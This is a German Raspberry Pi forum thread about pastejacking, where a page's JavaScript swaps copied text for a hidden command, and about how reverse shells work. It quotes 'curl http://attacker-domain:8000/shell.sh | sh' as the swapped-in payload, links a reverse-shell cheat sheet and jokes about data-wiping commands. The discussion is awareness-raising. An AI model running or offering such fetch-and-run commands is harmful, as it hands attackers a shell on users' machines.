Copy & Paste ??

  • Danke fuer die Warnung :thumbup:Das ist boese.

    Aber wenn ich auf der Webseite lese

    Code
    sudo aptget update

    und dann nach copy und paste auf meiner Command line sehe

    Code
    curl http://attacker-domain:8000/shell.sh | sh

    sollten doch schon alle Alarmglocken laeuten :)

  • framp Naja, wenn ich ein Mehrzeiler habe (oder einen Zeilenumbruch mit kopiere), z.B.

    Code
    ls -l
    
    echo "Bäh!"

    Dann kann es schon anders aussehen. ;)


    //Edit Bzw. den Zeilenumbruch macht es ja von alleine, denn der einzufügende Code wäre laut Quelltext der Seite:

    Code
    'curl http://attacker-domain:8000/shell.sh | sh\n'

    Das \n am Ende der Zeile sieht man nur nicht im Formularfeld.

  • framp Wenn die Alarmglocken läuten ist ja schon zu spät, und wer weiss wie lange beziehungsweise eben wie kurz das sichtbar ist. Das erste was das heruntergeladene Skript machen wird, wäre sinnvollerweise zu versuchen per ANSI-Escapesequenzen wieder in diese Zeile zu kommen und sie mit ``sudo apt-get update`` zu überschreiben.

    Bei mir hat das Beispiel jetzt nicht funktioniert. Dazu hätte ich JavaScript für diese Seite erlauben müssen. Und tatsächlich Strg+C/Strg+V verwenden statt einfach markieren und mittlere Maustaste zum einfügen.

    “Dawn, n.: The time when men of reason go to bed.” — Ambrose Bierce, “The Devil's Dictionary”

  • ist ja schon zu spät

    Jein. Wenn man bevor man den Link anklickt mit der Maus drüber hoovert kann man den Link sehen. Aber das perfide ist ja dass es auch normale Webseitenlinks sein können und die sieht man sich nicht jedesmal vor dem Anklicken an. Ergo hilft nur das omnipraesente JS zu deaktivieren ||

  • Bei mir hat das Beispiel jetzt nicht funktioniert. Dazu hätte ich JavaScript für diese Seite erlauben müssen. Und tatsächlich Strg+C/Strg+V verwenden statt einfach markieren und mittlere Maustaste zum einfügen.

    Ich habe es auch erfolglos versucht mit Firefox ESR unter Raspbian Stretch. JS erlauben für wizer-training.com hat auch nichts bewirkt. Weder markieren und mittlere Maustaste, noch Srtg+C/Strg+V. Also keine neue Zeile.

  • Da werden zwei Angriffe kombiniert.

    • Kontrolle über die Zwischenablage des Nutzers via JavaScript
      Auf die Anzeige der URL kann und darf man sich nicht verlassen.
    • Reverse Shell

    Hier gibt es ein Cheat-Sheet für reverse Shell in unterschidlichen Sprachen: https://highon.coffee/blog/reverse-shell-cheat-sheet/

    Es wird ein Prozess gestartet, stdin und stdout (und ggf. stderr) werden zu einem Netzwerksocket weitergeleitet.

    Der Angreifer benötigt lediglich noch einen Server, der im Internet erreichbar ist und auf dem Port lauscht, mit dem sich das Opfer verbindet.

    Nachdem die Verbindung aufgebaut ist, kann der Angreifer über seine Netcat Session Befehle beim Opfer ausführen.

    Der Begriff reverse Shell kommt daher, da die Richtung des Verbindungsaufbaus von innen nach außen geschieht.

    Normalerweise wird eine Verbindung zu einer Shell vom Nutzer aufgebaut und nicht von dem Rechner, mit dem sich der Angreifer verbinden will.

    D.h. möglicherweise greifen sogar Firewalls nicht, wenn diese Verbindung z.B. via Port 80 geschieht.

    Für die Firewall sieht es wie eine gewöhnliche Verbindung zu einem erlaubten Port aus.

    Solange man diese Befehle als normaler User im Terminal einfügt, steht noch die Passwortabfrage im Weg. Spätestens dann sieht der Nutzer, was im Terminal steht. Wenn man aber mit root eingeloggt ist, dann ist alles verloren. Wenn man das mit dem User macht, ist ggf. nur das Home-Verzeichnis des Users kompromittiert. Wenn es mit dem User root passiert ist, dann gilt das komplette System als kompromittiert.

  • Gerade in unserem (Raspsberry Pi) Bereich gibt es ja viele Leute, die von Linux keine oder noch nicht viel Ahnung haben. Ist ja erstmal nicht schlimm. Aber da wird oft blind Code aus den Anleitungen dieser Welt per C & P in die Konsole geworfen.

    Schlimm genug, dass man einen großen Teil der Anleitungen in die Tonne kloppen kann, weil die veraltet, falsch oder z.T. sogar gefählich sind. Jetzt muss man noch dank der achaischen Methoden aufpassen welche Anleitung man den Hilfesuchenden empfiehlt. :shy: Davon abgesehen, dass viele Leute erst versuchen werden ihre Probleme selber zu lösen und blind in die Falle treten könnten.

    Einfach den kopierten zur Kontrolle in einen Texteditor einfügen

    Das habe ich mir schon zeitig angewöhnt, auch gerade weil in vielen Tutorials einfach Skripte direkt aus dem I-Net an die Shell "gepiped" werden. Das ist im Grunde ein ähnliches Problem, was blindes Vertrauen betrifft.

  • FSC830 Ja danke, dass Du versuchst mir noch mal so etwas banales näher zu bringen. Das kenne ich schon vom Netscape-Navigator seit Ende der 90er. Hat aber so überhaupt nichts mit irgend etwas hier zu tun. Der Angriff erfolgt nicht über einen Link, da sieht man nix wenn man über dem ”verminten” Text hovert.

    @DeaD_EyE Wenn es denn ein Passwort für ``sudo`` gibt. Es gibt Systeme/Distributionen wo bestimmte Benutzer ``sudo`` grundsätzlich ohne Passwort verwenden können. Für den Raspi kenne ich mindestens eine etwas verbreitetere: OSMC.

    “Dawn, n.: The time when men of reason go to bed.” — Ambrose Bierce, “The Devil's Dictionary”

  • Wenn es denn ein Passwort für ``sudo`` gibt. Es gibt Systeme/Distributionen wo bestimmte Benutzer ``sudo`` grundsätzlich ohne Passwort verwenden können. Für den Raspi kenne ich mindestens eine etwas verbreitetere: OSMC.

    Mit Arch Linux passiert mir das nicht.

    Mit einem Standard Debian auch nicht.

    Bei Raspberry PI OS müsste ich selbst zunächst nachsehen, was dort eingestellt ist.

    Ich bin generell kein Freund von Copy&Paste.

    Manchmal reicht es aus einen Befehl anzugeben und irgendjemand wird diesen Befehl mit root-Rechten in das Terminal einfügen, ja sogar selbst eintippen. Ein Beispiel gab es mal in einem Forum. Dort hat jemand aus Spaß den bekannten Befehl zum Lösen aller Daten gepostet. Der Fragesteller war ziemlich enttäuscht, als er den Befehl eingegeben hat. Jedenfalls hatte er danach wieder freien Platz auf seiner Festplatte.

  • Dort hat jemand aus Spaß den bekannten Befehl zum Lösen aller Daten gepostet.

    42 ? :lol:

    Der Fragesteller war ziemlich enttäuscht, als er den Befehl eingegeben hat.

    Das muss aber schon verdammt lange her sein, denn das funktioniert IMHO schon ewig nicht mehr.

  • Ich kaufe ein "c" und ein "h"

    :lol::lol::lol:

    Das ist so wie früher bei DOS:

    Gib doch mal "del *.*" ein :fies::fies:

    Spoiler anzeigen

    Pi4 V1.1, 4 GB, USB3-Hub, 250 GB SSD, Bullseye 64, Mate-Desktop, SD-Card Extender (ruht)
    Pi3b Pihole (Buster)
    Pi3b, 128-GB-SSD, Buster, mit 10,1" Monitor als MM (ohne Spiegel ;) )
    orangepi zero, ohne Beschäftigung
    Pi 5 4 GB im GeekPi-Gehäuse mit externer SSD (Bookworm)


    Warnung: Raspi und Co. machen süchtig! :)

Jetzt mitmachen!

Du hast noch kein Benutzerkonto auf unserer Seite? Registriere dich kostenlos und nimm an unserer Community teil!